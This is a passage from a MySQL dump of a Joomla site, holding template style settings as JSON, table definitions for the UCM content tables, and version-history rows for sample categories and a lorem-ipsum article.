Aspyre.\",\"show_social_icons\":\"1\",\"social_position\":\"top1\",\"facebook\":\"#\",\"twitter\":\"#\",\"googleplus\":\"#\",\"pinterest\":\"#\",\"linkedin\":\"#\",\"dribbble\":\"#\",\"behance\":\"#\",\"youtube\":\"#\",\"flickr\":\"#\",\"skype\":\"#\",\"vk\":\"#\",\"enable_contactinfo\":\"0\",\"contact_position\":\"top2\",\"contact_phone\":\"031 564 3210 \",\"contact_email\":\"info@dashlogic.com\",\"comingsoon_mode\":\"0\",\"comingsoon_title\":\"Coming Soon Title\",\"comingsoon_date\":\"05-10-2018\",\"comingsoon_content\":\"Coming soon content\",\"preset\":\"preset4\",\"preset1_bg\":\"#ffffff\",\"preset1_text\":\"#000000\",\"preset1_major\":\"#22b8f0\",\"preset2_bg\":\"#ffffff\",\"preset2_text\":\"#000000\",\"preset2_major\":\"#3d449a\",\"preset3_bg\":\"#ffffff\",\"preset3_text\":\"#000000\",\"preset3_major\":\"#2bb673\",\"preset4_bg\":\"#ffffff\",\"preset4_text\":\"#333333\",\"preset4_major\":\"#f38318\",\"layoutlist\":\"default.json\",\"layout\":\"[{\\\"type\\\":\\\"row\\\",\\\"layout\\\":\\\"66\\\",\\\"settings\\\":{\\\"name\\\":\\\"Top Bar\\\",\\\"background_color\\\":\\\"#f5f5f5\\\",\\\"color\\\":\\\"#999999\\\",\\\"background_image\\\":\\\"\\\",\\\"background_repeat\\\":\\\"no-repeat\\\",\\\"background_size\\\":\\\"cover\\\",\\\"background_attachment\\\":\\\"fixed\\\",\\\"background_position\\\":\\\"0 0\\\",\\\"link_color\\\":\\\"\\\",\\\"link_hover_color\\\":\\\"\\\",\\\"hidden_xs\\\":0,\\\"hidden_sm\\\":0,\\\"hidden_md\\\":0,\\\"padding\\\":\\\"\\\",\\\"margin\\\":\\\"\\\",\\\"fluidrow\\\":0,\\\"custom_class\\\":\\\"\\\",\\\"bg_position\\\":\\\"contain\\\",\\\"bg_img_size\\\":\\\"cover\\\",\\\"bg_repeat\\\":\\\"no-repeat\\\",\\\"md_hidden\\\":0,\\\"ms_hidden\\\":0,\\\"xs_hidden\\\":0,\\\"text_color\\\":\\\"#ffffff\\\",\\\"bg_image\\\":\\\"images\\/powered_by.png\\\",\\\"bg_color\\\":\\\"#f02222\\\"},\\\"attr\\\":[{\\\"type\\\":\\\"sp_col\\\",\\\"className\\\":\\\"layout-column col-sm-6\\\",\\\"settings\\\":{\\\"xs_col\\\":\\\"\\\",\\\"sm_col\\\":\\\"col-sm-6\\\",\\\"hidden_md\\\":0,\\\"hidden_sm\\\":0,\\\"hidden_xs\\\":0,\\\"xs_hidden\\\":0,\\\"ms_hidden\\\":0,\\\"md_hidden\\\":0,\\\"custom_class\\\":\\\"\\\",\\\"name\\\":\\\"top1\\\",\\\"column_type\\\":0,\\\"sortableitem\\\":\\\"[object Object]\\\"}},{\\\"type\\\":\\\"sp_col\\\",\\\"className\\\":\\\"layout-column col-sm-6\\\",\\\"settings\\\":{\\\"column_type\\\":0,\\\"name\\\":\\\"top2\\\",\\\"xs_hidden\\\":0,\\\"ms_hidden\\\":0,\\\"md_hidden\\\":0,\\\"custom_class\\\":\\\"\\\",\\\"sortableitem\\\":\\\"[object Object]\\\"}}]},{\\\"type\\\":\\\"row\\\",\\\"layout\\\":\\\"39\\\",\\\"settings\\\":{\\\"name\\\":\\\"Header\\\",\\\"background_color\\\":\\\"\\\",\\\"color\\\":\\\"\\\",\\\"background_image\\\":\\\"\\\",\\\"link_color\\\":\\\"\\\",\\\"link_hover_color\\\":\\\"\\\",\\\"hidden_xs\\\":0,\\\"hidden_sm\\\":0,\\\"hidden_md\\\":0,\\\"padding\\\":\\\"\\\",\\\"margin\\\":\\\"\\\",\\\"fluidrow\\\":0,\\\"custom_class\\\":\\\"\\\"},\\\"attr\\\":[{\\\"type\\\":\\\"sp_col\\\",\\\"className\\\":\\\"layout-column col-sm-3\\\",\\\"settings\\\":{\\\"column_type\\\":0,\\\"name\\\":\\\"logo\\\",\\\"hidden_xs\\\":0,\\\"hidden_sm\\\":0,\\\"hidden_md\\\":0,\\\"sm_col\\\":\\\"\\\",\\\"xs_col\\\":\\\"col-xs-8\\\",\\\"custom_class\\\":\\\"\\\",\\\"xs_hidden\\\":0,\\\"ms_hidden\\\":0,\\\"md_hidden\\\":0,\\\"sortableitem\\\":\\\"[object Object]\\\"}},{\\\"type\\\":\\\"sp_col\\\",\\\"className\\\":\\\"layout-column col-sm-9\\\",\\\"settings\\\":{\\\"xs_col\\\":\\\"col-xs-4\\\",\\\"sm_col\\\":\\\"\\\",\\\"hidden_md\\\":0,\\\"hidden_sm\\\":0,\\\"hidden_xs\\\":0,\\\"column_type\\\":0,\\\"name\\\":\\\"menu\\\",\\\"xs_hidden\\\":0,\\\"ms_hidden\\\":0,\\\"md_hidden\\\":0,\\\"custom_class\\\":\\\"\\\",\\\"sortableitem\\\":\\\"[object Object]\\\"}}]},{\\\"type\\\":\\\"row\\\",\\\"layout\\\":12,\\\"settings\\\":{\\\"custom_class\\\":\\\"\\\",\\\"fluidrow\\\":1,\\\"margin\\\":\\\"\\\",\\\"padding\\\":\\\"\\\",\\\"hidden_md\\\":0,\\\"hidden_sm\\\":0,\\\"hidden_xs\\\":0,\\\"link_hover_color\\\":\\\"\\\",\\\"link_color\\\":\\\"\\\",\\\"background_image\\\":\\\"\\\",\\\"color\\\":\\\"\\\",\\\"background_color\\\":\\\"\\\",\\\"name\\\":\\\"Page Title\\\"},\\\"attr\\\":[{\\\"type\\\":\\\"sp_col\\\",\\\"className\\\":\\\"layout-column col-sm-12\\\",\\\"settings\\\":{\\\"custom_class\\\":\\\"\\\",\\\"xs_col\\\":\\\"\\\",\\\"sm_col\\\":\\\"\\\",\\\"hidden_md\\\":0,\\\"hidden_sm\\\":0,\\\"hidden_xs\\\":0,\\\"name\\\":\\\"title\\\",\\\"column_type\\\":0}}]},{\\\"type\\\":\\\"row\\\",\\\"layout\\\":\\\"363\\\",\\\"settings\\\":{\\\"custom_class\\\":\\\"\\\",\\\"md_hidden\\\":0,\\\"ms_hidden\\\":0,\\\"xs_hidden\\\":0,\\\"link_hover_color\\\":\\\"\\\",\\\"link_color\\\":\\\"\\\",\\\"text_color\\\":\\\"\\\",\\\"bg_image\\\":\\\"\\\",\\\"bg_color\\\":\\\"\\\",\\\"name\\\":\\\"Main Body\\\"},\\\"attr\\\":[{\\\"type\\\":\\\"sp_col\\\",\\\"className\\\":\\\"layout-column col-sm-3\\\",\\\"settings\\\":{\\\"column_type\\\":0,\\\"name\\\":\\\"left\\\",\\\"xs_hidden\\\":0,\\\"ms_hidden\\\":0,\\\"md_hidden\\\":0,\\\"custom_class\\\":\\\"custom-class\\\",\\\"sortableitem\\\":\\\"[object Object]\\\"}},{\\\"type\\\":\\\"sp_col\\\",\\\"className\\\":\\\"layout-column col-sm-6\\\",\\\"settings\\\":{\\\"column_type\\\":1,\\\"name\\\":\\\"\\\",\\\"custom_class\\\":\\\"\\\",\\\"md_hidden\\\":0,\\\"ms_hidden\\\":0,\\\"xs_hidden\\\":0,\\\"sortableitem\\\":\\\"[object Object]\\\"}},{\\\"type\\\":\\\"sp_col\\\",\\\"className\\\":\\\"layout-column col-sm-3\\\",\\\"settings\\\":{\\\"custom_class\\\":\\\"class2\\\",\\\"md_hidden\\\":0,\\\"ms_hidden\\\":0,\\\"xs_hidden\\\":0,\\\"name\\\":\\\"right\\\",\\\"column_type\\\":0,\\\"sortableitem\\\":\\\"[object Object]\\\"}}]},{\\\"type\\\":\\\"row\\\",\\\"layout\\\":12,\\\"settings\\\":{\\\"custom_class\\\":\\\"\\\",\\\"fluidrow\\\":0,\\\"margin\\\":\\\"\\\",\\\"padding\\\":\\\"\\\",\\\"hidden_md\\\":0,\\\"hidden_sm\\\":0,\\\"hidden_xs\\\":0,\\\"link_hover_color\\\":\\\"\\\",\\\"link_color\\\":\\\"\\\",\\\"background_image\\\":\\\"\\\",\\\"color\\\":\\\"\\\",\\\"background_color\\\":\\\"\\\",\\\"name\\\":\\\"Position 01\\\"},\\\"attr\\\":[{\\\"type\\\":\\\"sp_col\\\",\\\"className\\\":\\\"layout-column col-sm-12\\\",\\\"settings\\\":{\\\"custom_class\\\":\\\"\\\",\\\"xs_col\\\":\\\"\\\",\\\"sm_col\\\":\\\"\\\",\\\"hidden_md\\\":0,\\\"hidden_sm\\\":0,\\\"hidden_xs\\\":0,\\\"name\\\":\\\"position1\\\",\\\"column_type\\\":0}}]},{\\\"type\\\":\\\"row\\\",\\\"layout\\\":\\\"3333\\\",\\\"settings\\\":{\\\"name\\\":\\\"Bottom\\\",\\\"background_color\\\":\\\"#c7c7c7\\\",\\\"color\\\":\\\"\\\",\\\"background_image\\\":\\\"\\\",\\\"link_color\\\":\\\"\\\",\\\"link_hover_color\\\":\\\"\\\",\\\"hidden_xs\\\":0,\\\"hidden_sm\\\":0,\\\"hidden_md\\\":0,\\\"padding\\\":\\\"40px 0px\\\",\\\"margin\\\":\\\"\\\",\\\"fluidrow\\\":0,\\\"custom_class\\\":\\\"\\\"},\\\"attr\\\":[{\\\"type\\\":\\\"sp_col\\\",\\\"className\\\":\\\"layout-column col-sm-3\\\",\\\"settings\\\":{\\\"column_type\\\":0,\\\"name\\\":\\\"bottom1\\\",\\\"hidden_xs\\\":0,\\\"hidden_sm\\\":0,\\\"hidden_md\\\":0,\\\"sm_col\\\":\\\"col-sm-6\\\",\\\"xs_col\\\":\\\"\\\",\\\"custom_class\\\":\\\"\\\",\\\"sortableitem\\\":\\\"[object Object]\\\"}},{\\\"type\\\":\\\"sp_col\\\",\\\"className\\\":\\\"layout-column col-sm-3\\\",\\\"settings\\\":{\\\"custom_class\\\":\\\"\\\",\\\"xs_col\\\":\\\"\\\",\\\"sm_col\\\":\\\"col-sm-6\\\",\\\"hidden_md\\\":0,\\\"hidden_sm\\\":0,\\\"hidden_xs\\\":0,\\\"name\\\":\\\"bottom2\\\",\\\"column_type\\\":0}},{\\\"type\\\":\\\"sp_col\\\",\\\"className\\\":\\\"layout-column col-sm-3 column-active\\\",\\\"settings\\\":{\\\"custom_class\\\":\\\"darkgrey\\\",\\\"xs_col\\\":\\\"\\\",\\\"sm_col\\\":\\\"col-sm-6\\\",\\\"hidden_md\\\":0,\\\"hidden_sm\\\":0,\\\"hidden_xs\\\":0,\\\"name\\\":\\\"bottom3\\\",\\\"column_type\\\":0}},{\\\"type\\\":\\\"sp_col\\\",\\\"className\\\":\\\"layout-column col-sm-3\\\",\\\"settings\\\":{\\\"custom_class\\\":\\\"\\\",\\\"xs_col\\\":\\\"\\\",\\\"sm_col\\\":\\\"col-sm-6\\\",\\\"hidden_md\\\":0,\\\"hidden_sm\\\":0,\\\"hidden_xs\\\":0,\\\"name\\\":\\\"bottom4\\\",\\\"column_type\\\":0}}]},{\\\"type\\\":\\\"row\\\",\\\"layout\\\":12,\\\"settings\\\":{\\\"custom_class\\\":\\\"\\\",\\\"md_hidden\\\":0,\\\"ms_hidden\\\":0,\\\"xs_hidden\\\":0,\\\"link_hover_color\\\":\\\"\\\",\\\"link_color\\\":\\\"\\\",\\\"text_color\\\":\\\"\\\",\\\"bg_image\\\":\\\"\\\",\\\"bg_color\\\":\\\"\\\",\\\"name\\\":\\\"Footer\\\"},\\\"attr\\\":[{\\\"type\\\":\\\"sp_col\\\",\\\"className\\\":\\\"layout-column col-sm-12\\\",\\\"settings\\\":{\\\"xs_col\\\":\\\"\\\",\\\"sm_col\\\":\\\"\\\",\\\"hidden_md\\\":0,\\\"hidden_sm\\\":0,\\\"hidden_xs\\\":0,\\\"column_type\\\":0,\\\"name\\\":\\\"footer1\\\",\\\"xs_hidden\\\":0,\\\"ms_hidden\\\":0,\\\"md_hidden\\\":0,\\\"custom_class\\\":\\\"\\\",\\\"sortableitem\\\":\\\"[object Object]\\\"}}]}]\",\"menu\":\"mainmenu\",\"menu_type\":\"mega_offcanvas\",\"dropdown_width\":\"\",\"menu_animation\":\"menu-fade\",\"enable_body_font\":\"1\",\"body_font\":\"{\\\"fontFamily\\\":\\\"Oxygen\\\",\\\"fontWeight\\\":\\\"300\\\",\\\"fontSubset\\\":\\\"latin-ext\\\",\\\"fontSize\\\":\\\"\\\"}\",\"enable_h1_font\":\"1\",\"h1_font\":\"{\\\"fontFamily\\\":\\\"Oxygen\\\",\\\"fontWeight\\\":\\\"300\\\",\\\"fontSubset\\\":\\\"latin-ext\\\",\\\"fontSize\\\":\\\"40\\\"}\",\"enable_h2_font\":\"1\",\"h2_font\":\"{\\\"fontFamily\\\":\\\"Oxygen\\\",\\\"fontWeight\\\":\\\"300\\\",\\\"fontSubset\\\":\\\"latin-ext\\\",\\\"fontSize\\\":\\\"32\\\"}\",\"enable_h3_font\":\"1\",\"h3_font\":\"{\\\"fontFamily\\\":\\\"Oxygen\\\",\\\"fontWeight\\\":\\\"300\\\",\\\"fontSubset\\\":\\\"latin-ext\\\",\\\"fontSize\\\":\\\"28\\\"}\",\"enable_h4_font\":\"1\",\"h4_font\":\"{\\\"fontFamily\\\":\\\"Oxygen\\\",\\\"fontWeight\\\":\\\"300\\\",\\\"fontSubset\\\":\\\"latin-ext\\\",\\\"fontSize\\\":\\\"24\\\"}\",\"enable_h5_font\":\"1\",\"h5_font\":\"{\\\"fontFamily\\\":\\\"Oxygen\\\",\\\"fontWeight\\\":\\\"300\\\",\\\"fontSubset\\\":\\\"latin-ext\\\",\\\"fontSize\\\":\\\"20\\\"}\",\"enable_h6_font\":\"1\",\"h6_font\":\"{\\\"fontFamily\\\":\\\"Oxygen\\\",\\\"fontWeight\\\":\\\"300\\\",\\\"fontSubset\\\":\\\"latin-ext\\\",\\\"fontSize\\\":\\\"\\\"}\",\"enable_navigation_font\":\"0\",\"navigation_font\":\"{\\\"fontFamily\\\":\\\"Open Sans\\\",\\\"fontWeight\\\":\\\"regular\\\",\\\"fontSubset\\\":\\\"latin\\\",\\\"fontSize\\\":\\\"\\\"}\",\"enable_custom_font\":\"0\",\"custom_font\":\"{\\\"fontFamily\\\":\\\"ABeeZee\\\",\\\"fontWeight\\\":\\\"regular\\\",\\\"fontSubset\\\":\\\"latin\\\",\\\"fontSize\\\":\\\"\\\"}\",\"custom_font_selectors\":\"\",\"before_head\":\"\",\"before_body\":\"\",\"custom_css\":\"\",\"custom_js\":\"\",\"compress_css\":\"0\",\"compress_js\":\"0\",\"exclude_js\":\"\",\"lessoption\":\"1\",\"show_post_format\":\"0\",\"commenting_engine\":\"disabled\",\"disqus_subdomain\":\"\",\"disqus_devmode\":\"0\",\"intensedebate_acc\":\"\",\"fb_appID\":\"\",\"fb_width\":\"500\",\"fb_cpp\":\"10\",\"comments_count\":\"0\",\"social_share\":\"0\"}');
/*!40000 ALTER TABLE `atlyh_template_styles` ENABLE KEYS */;
UNLOCK TABLES;
--
-- Table structure for table `atlyh_ucm_base`
--
DROP TABLE IF EXISTS `atlyh_ucm_base`;
/*!40101 SET @saved_cs_client = @@character_set_client */;
/*!40101 SET character_set_client = utf8 */;
CREATE TABLE `atlyh_ucm_base` (
`ucm_id` int(10) unsigned NOT NULL,
`ucm_item_id` int(10) NOT NULL,
`ucm_type_id` int(11) NOT NULL,
`ucm_language_id` int(11) NOT NULL,
PRIMARY KEY (`ucm_id`),
KEY `idx_ucm_item_id` (`ucm_item_id`),
KEY `idx_ucm_type_id` (`ucm_type_id`),
KEY `idx_ucm_language_id` (`ucm_language_id`)
) ENGINE=InnoDB DEFAULT CHARSET=utf8 COLLATE=utf8_general_ci;
/*!40101 SET character_set_client = @saved_cs_client */;
--
-- Dumping data for table `atlyh_ucm_base`
--
LOCK TABLES `atlyh_ucm_base` WRITE;
/*!40000 ALTER TABLE `atlyh_ucm_base` DISABLE KEYS */;
/*!40000 ALTER TABLE `atlyh_ucm_base` ENABLE KEYS */;
UNLOCK TABLES;
--
-- Table structure for table `atlyh_ucm_content`
--
DROP TABLE IF EXISTS `atlyh_ucm_content`;
/*!40101 SET @saved_cs_client = @@character_set_client */;
/*!40101 SET character_set_client = utf8 */;
CREATE TABLE `atlyh_ucm_content` (
`core_content_id` int(10) unsigned NOT NULL AUTO_INCREMENT,
`core_type_alias` varchar(255) NOT NULL DEFAULT '' COMMENT 'FK to the content types table',
`core_title` varchar(255) NOT NULL,
`core_alias` varchar(255) CHARACTER SET utf8 COLLATE utf8_bin NOT NULL DEFAULT '',
`core_body` mediumtext NOT NULL,
`core_state` tinyint(1) NOT NULL DEFAULT 0,
`core_checked_out_time` varchar(255) NOT NULL DEFAULT '',
`core_checked_out_user_id` int(10) unsigned NOT NULL DEFAULT 0,
`core_access` int(10) unsigned NOT NULL DEFAULT 0,
`core_params` text NOT NULL,
`core_featured` tinyint(4) unsigned NOT NULL DEFAULT 0,
`core_metadata` varchar(2048) NOT NULL COMMENT 'JSON encoded metadata properties.',
`core_created_user_id` int(10) unsigned NOT NULL DEFAULT 0,
`core_created_by_alias` varchar(255) NOT NULL DEFAULT '',
`core_created_time` datetime NOT NULL DEFAULT '0000-00-00 00:00:00',
`core_modified_user_id` int(10) unsigned NOT NULL DEFAULT 0 COMMENT 'Most recent user that modified',
`core_modified_time` datetime NOT NULL DEFAULT '0000-00-00 00:00:00',
`core_language` char(7) NOT NULL,
`core_publish_up` datetime NOT NULL,
`core_publish_down` datetime NOT NULL,
`core_content_item_id` int(10) unsigned DEFAULT NULL COMMENT 'ID from the individual type table',
`asset_id` int(10) unsigned DEFAULT NULL COMMENT 'FK to the #__assets table.',
`core_images` text NOT NULL,
`core_urls` text NOT NULL,
`core_hits` int(10) unsigned NOT NULL DEFAULT 0,
`core_version` int(10) unsigned NOT NULL DEFAULT 1,
`core_ordering` int(11) NOT NULL DEFAULT 0,
`core_metakey` text NOT NULL,
`core_metadesc` text NOT NULL,
`core_catid` int(10) unsigned NOT NULL DEFAULT 0,
`core_xreference` varchar(50) NOT NULL COMMENT 'A reference to enable linkages to external data sets.',
`core_type_id` int(10) unsigned DEFAULT NULL,
PRIMARY KEY (`core_content_id`),
KEY `tag_idx` (`core_state`,`core_access`),
KEY `idx_access` (`core_access`),
KEY `idx_alias` (`core_alias`),
KEY `idx_language` (`core_language`),
KEY `idx_title` (`core_title`),
KEY `idx_modified_time` (`core_modified_time`),
KEY `idx_created_time` (`core_created_time`),
KEY `idx_content_type` (`core_type_alias`),
KEY `idx_core_modified_user_id` (`core_modified_user_id`),
KEY `idx_core_checked_out_user_id` (`core_checked_out_user_id`),
KEY `idx_core_created_user_id` (`core_created_user_id`),
KEY `idx_core_type_id` (`core_type_id`)
) ENGINE=InnoDB DEFAULT CHARSET=utf8 COLLATE=utf8_general_ci COMMENT='Contains core content data in name spaced fields';
/*!40101 SET character_set_client = @saved_cs_client */;
--
-- Dumping data for table `atlyh_ucm_content`
--
LOCK TABLES `atlyh_ucm_content` WRITE;
/*!40000 ALTER TABLE `atlyh_ucm_content` DISABLE KEYS */;
/*!40000 ALTER TABLE `atlyh_ucm_content` ENABLE KEYS */;
UNLOCK TABLES;
--
-- Table structure for table `atlyh_ucm_history`
--
DROP TABLE IF EXISTS `atlyh_ucm_history`;
/*!40101 SET @saved_cs_client = @@character_set_client */;
/*!40101 SET character_set_client = utf8 */;
CREATE TABLE `atlyh_ucm_history` (
`version_id` int(10) unsigned NOT NULL AUTO_INCREMENT,
`ucm_item_id` int(10) unsigned NOT NULL,
`ucm_type_id` int(10) unsigned NOT NULL,
`version_note` varchar(255) NOT NULL DEFAULT '' COMMENT 'Optional version name',
`save_date` datetime NOT NULL DEFAULT '0000-00-00 00:00:00',
`editor_user_id` int(10) unsigned NOT NULL DEFAULT 0,
`character_count` int(10) unsigned NOT NULL DEFAULT 0 COMMENT 'Number of characters in this version.',
`sha1_hash` varchar(50) NOT NULL DEFAULT '' COMMENT 'SHA1 hash of the version_data column.',
`version_data` mediumtext NOT NULL COMMENT 'json-encoded string of version data',
`keep_forever` tinyint(4) NOT NULL DEFAULT 0 COMMENT '0=auto delete; 1=keep',
PRIMARY KEY (`version_id`),
KEY `idx_ucm_item_id` (`ucm_type_id`,`ucm_item_id`),
KEY `idx_save_date` (`save_date`)
) ENGINE=InnoDB AUTO_INCREMENT=76 DEFAULT CHARSET=utf8 COLLATE=utf8_general_ci;
/*!40101 SET character_set_client = @saved_cs_client */;
--
-- Dumping data for table `atlyh_ucm_history`
--
LOCK TABLES `atlyh_ucm_history` WRITE;
/*!40000 ALTER TABLE `atlyh_ucm_history` DISABLE KEYS */;
INSERT INTO `atlyh_ucm_history` VALUES (1,19,6,'','2015-02-02 06:05:15',692,580,'8b8b28d0735048ef374cfed409baeca2e9c48a2a','{\"id\":19,\"asset_id\":\"44\",\"parent_id\":\"1\",\"lft\":\"105\",\"rgt\":132,\"level\":1,\"path\":\"sample-data-articles\\/joomla\",\"extension\":\"com_content\",\"title\":\"Joomla!\",\"alias\":\"joomla\",\"note\":\"\",\"description\":\"\",\"published\":\"1\",\"checked_out\":\"864\",\"checked_out_time\":\"2015-02-02 06:05:10\",\"access\":\"1\",\"params\":\"{\\\"category_layout\\\":\\\"\\\",\\\"image\\\":\\\"\\\"}\",\"metadesc\":\"\",\"metakey\":\"\",\"metadata\":\"{\\\"author\\\":\\\"\\\",\\\"robots\\\":\\\"\\\"}\",\"created_user_id\":\"864\",\"created_time\":\"2011-01-01 00:00:01\",\"modified_user_id\":\"864\",\"modified_time\":\"2015-02-02 06:05:15\",\"hits\":\"0\",\"language\":\"*\",\"version\":\"1\"}',0),(2,21,6,'','2015-02-02 06:05:23',692,872,'44c955d32c91be43379e62067ff88355a5e6afd7','{\"id\":21,\"asset_id\":\"46\",\"parent_id\":\"19\",\"lft\":\"130\",\"rgt\":131,\"level\":2,\"path\":\"joomla\\/extensions\\/components\",\"extension\":\"com_content\",\"title\":\"Components\",\"alias\":\"components\",\"note\":\"\",\"description\":\"<p>Components are larger extensions that produce the major content for your site. Each component has one or more \\\"views\\\" that control how content is displayed. In the Joomla administrator there are additional extensions such as Menus, Redirection, and the extension managers.<\\/p>\",\"published\":\"1\",\"checked_out\":\"864\",\"checked_out_time\":\"2015-02-02 06:05:17\",\"access\":\"1\",\"params\":\"{\\\"category_layout\\\":\\\"\\\",\\\"image\\\":\\\"\\\"}\",\"metadesc\":\"\",\"metakey\":\"\",\"metadata\":\"{\\\"author\\\":\\\"\\\",\\\"robots\\\":\\\"\\\"}\",\"created_user_id\":\"864\",\"created_time\":\"2011-01-01 00:00:01\",\"modified_user_id\":\"864\",\"modified_time\":\"2015-02-02 06:05:23\",\"hits\":\"0\",\"language\":\"*\",\"version\":\"1\"}',0),(3,79,6,'','2015-02-02 06:12:46',692,511,'633bb165d3f0f0ffc2722ee67a8a24736aadfb47','{\"id\":79,\"asset_id\":179,\"parent_id\":\"1\",\"lft\":\"91\",\"rgt\":92,\"level\":1,\"path\":null,\"extension\":\"com_content\",\"title\":\"Blog\",\"alias\":\"blog\",\"note\":\"\",\"description\":\"\",\"published\":\"1\",\"checked_out\":null,\"checked_out_time\":null,\"access\":\"1\",\"params\":\"{\\\"category_layout\\\":\\\"\\\",\\\"image\\\":\\\"\\\"}\",\"metadesc\":\"\",\"metakey\":\"\",\"metadata\":\"{\\\"author\\\":\\\"\\\",\\\"robots\\\":\\\"\\\"}\",\"created_user_id\":\"864\",\"created_time\":\"2015-02-02 06:12:46\",\"modified_user_id\":null,\"modified_time\":null,\"hits\":\"0\",\"language\":\"*\",\"version\":null}',0),(4,80,6,'','2015-02-02 18:42:14',692,511,'d9e56992245d6c642c811b6be37a65ad944605d4','{\"id\":80,\"asset_id\":191,\"parent_id\":\"1\",\"lft\":\"93\",\"rgt\":94,\"level\":1,\"path\":null,\"extension\":\"com_content\",\"title\":\"News\",\"alias\":\"news\",\"note\":\"\",\"description\":\"\",\"published\":\"1\",\"checked_out\":null,\"checked_out_time\":null,\"access\":\"1\",\"params\":\"{\\\"category_layout\\\":\\\"\\\",\\\"image\\\":\\\"\\\"}\",\"metadesc\":\"\",\"metakey\":\"\",\"metadata\":\"{\\\"author\\\":\\\"\\\",\\\"robots\\\":\\\"\\\"}\",\"created_user_id\":\"864\",\"created_time\":\"2015-02-02 18:42:14\",\"modified_user_id\":null,\"modified_time\":null,\"hits\":\"0\",\"language\":\"*\",\"version\":null}',0),(5,80,6,'','2015-02-02 18:42:30',692,551,'b0c69f126552d2f470dab4c2637f32d2d55d04ca','{\"id\":80,\"asset_id\":\"191\",\"parent_id\":\"79\",\"lft\":\"92\",\"rgt\":93,\"level\":2,\"path\":\"news\",\"extension\":\"com_content\",\"title\":\"News\",\"alias\":\"news\",\"note\":\"\",\"description\":\"\",\"published\":\"1\",\"checked_out\":\"864\",\"checked_out_time\":\"2015-02-02 18:42:24\",\"access\":\"1\",\"params\":\"{\\\"category_layout\\\":\\\"\\\",\\\"image\\\":\\\"\\\"}\",\"metadesc\":\"\",\"metakey\":\"\",\"metadata\":\"{\\\"author\\\":\\\"\\\",\\\"robots\\\":\\\"\\\"}\",\"created_user_id\":\"864\",\"created_time\":\"2015-02-02 18:42:14\",\"modified_user_id\":\"864\",\"modified_time\":\"2015-02-02 18:42:30\",\"hits\":\"0\",\"language\":\"*\",\"version\":\"1\"}',0),(6,81,6,'','2015-02-02 18:42:46',692,520,'c1186cda9e6fae853472a26d68bc50d2f9af3eef','{\"id\":81,\"asset_id\":192,\"parent_id\":\"79\",\"lft\":\"94\",\"rgt\":95,\"level\":2,\"path\":null,\"extension\":\"com_content\",\"title\":\"Tutorial\",\"alias\":\"tutorial\",\"note\":\"\",\"description\":\"\",\"published\":\"1\",\"checked_out\":null,\"checked_out_time\":null,\"access\":\"1\",\"params\":\"{\\\"category_layout\\\":\\\"\\\",\\\"image\\\":\\\"\\\"}\",\"metadesc\":\"\",\"metakey\":\"\",\"metadata\":\"{\\\"author\\\":\\\"\\\",\\\"robots\\\":\\\"\\\"}\",\"created_user_id\":\"864\",\"created_time\":\"2015-02-02 18:42:46\",\"modified_user_id\":null,\"modified_time\":null,\"hits\":\"0\",\"language\":\"*\",\"version\":null}',0),(7,82,6,'','2015-02-02 18:42:56',692,516,'8433516aea93072c0f29f750669e5b4dfe733e72','{\"id\":82,\"asset_id\":193,\"parent_id\":\"79\",\"lft\":\"96\",\"rgt\":97,\"level\":2,\"path\":null,\"extension\":\"com_content\",\"title\":\"Review\",\"alias\":\"review\",\"note\":\"\",\"description\":\"\",\"published\":\"1\",\"checked_out\":null,\"checked_out_time\":null,\"access\":\"1\",\"params\":\"{\\\"category_layout\\\":\\\"\\\",\\\"image\\\":\\\"\\\"}\",\"metadesc\":\"\",\"metakey\":\"\",\"metadata\":\"{\\\"author\\\":\\\"\\\",\\\"robots\\\":\\\"\\\"}\",\"created_user_id\":\"864\",\"created_time\":\"2015-02-02 18:42:56\",\"modified_user_id\":null,\"modified_time\":null,\"hits\":\"0\",\"language\":\"*\",\"version\":null}',0),(8,83,6,'','2015-02-02 18:43:15',692,518,'c054624137f36fae4f0cc107c6e7caa47aeb8401','{\"id\":83,\"asset_id\":194,\"parent_id\":\"79\",\"lft\":\"98\",\"rgt\":99,\"level\":2,\"path\":null,\"extension\":\"com_content\",\"title\":\"Updates\",\"alias\":\"updates\",\"note\":\"\",\"description\":\"\",\"published\":\"1\",\"checked_out\":null,\"checked_out_time\":null,\"access\":\"1\",\"params\":\"{\\\"category_layout\\\":\\\"\\\",\\\"image\\\":\\\"\\\"}\",\"metadesc\":\"\",\"metakey\":\"\",\"metadata\":\"{\\\"author\\\":\\\"\\\",\\\"robots\\\":\\\"\\\"}\",\"created_user_id\":\"864\",\"created_time\":\"2015-02-02 18:43:15\",\"modified_user_id\":null,\"modified_time\":null,\"hits\":\"0\",\"language\":\"*\",\"version\":null}',0),(9,71,1,'','2015-02-02 18:56:08',692,2452,'3199ad1fb625886490e0c300580c73a27ce5ad80','{\"id\":71,\"asset_id\":195,\"title\":\"Sed non bibendum urna lorem ipsum dolor sit amet, consectetur adipiscing elit\",\"alias\":\"sed-non-bibendum-urna-lorem-ipsum-dolor-sit-amet-consectetur-adipiscing-elit\",\"introtext\":\"\",\"fulltext\":\"\",\"state\":1,\"catid\":\"79\",\"created\":\"2015-02-02 18:56:08\",\"created_by\":\"864\",\"created_by_alias\":\"\",\"modified\":\"\",\"modified_by\":null,\"checked_out\":null,\"checked_out_time\":null,\"publish_up\":\"2015-02-02 18:56:08\",\"publish_down\":\"0000-00-00 00:00:00\",\"images\":\"{\\\"image_intro\\\":\\\"\\\",\\\"float_intro\\\":\\\"\\\",\\\"image_intro_alt\\\":\\\"\\\",\\\"image_intro_caption\\\":\\\"\\\",\\\"image_fulltext\\\":\\\"\\\",\\\"float_fulltext\\\":\\\"\\\",\\\"image_fulltext_alt\\\":\\\"\\\",\\\"image_fulltext_caption\\\":\\\"\\\"}\",\"urls\":\"{\\\"urla\\\":false,\\\"urlatext\\\":\\\"\\\",\\\"targeta\\\":\\\"\\\",\\\"urlb\\\":false,\\\"urlbtext\\\":\\\"\\\",\\\"targetb\\\":\\\"\\\",\\\"urlc\\\":false,\\\"urlctext\\\":\\\"\\\",\\\"targetc\\\":\\\"\\\"}\",\"attribs\":\"{\\\"show_title\\\":\\\"\\\",\\\"link_titles\\\":\\\"\\\",\\\"show_tags\\\":\\\"\\\",\\\"show_intro\\\":\\\"\\\",\\\"info_block_position\\\":\\\"\\\",\\\"show_category\\\":\\\"\\\",\\\"link_category\\\":\\\"\\\",\\\"show_parent_category\\\":\\\"\\\",\\\"link_parent_category\\\":\\\"\\\",\\\"show_author\\\":\\\"\\\",\\\"link_author\\\":\\\"\\\",\\\"show_create_date\\\":\\\"\\\",\\\"show_modify_date\\\":\\\"\\\",\\\"show_publish_date\\\":\\\"\\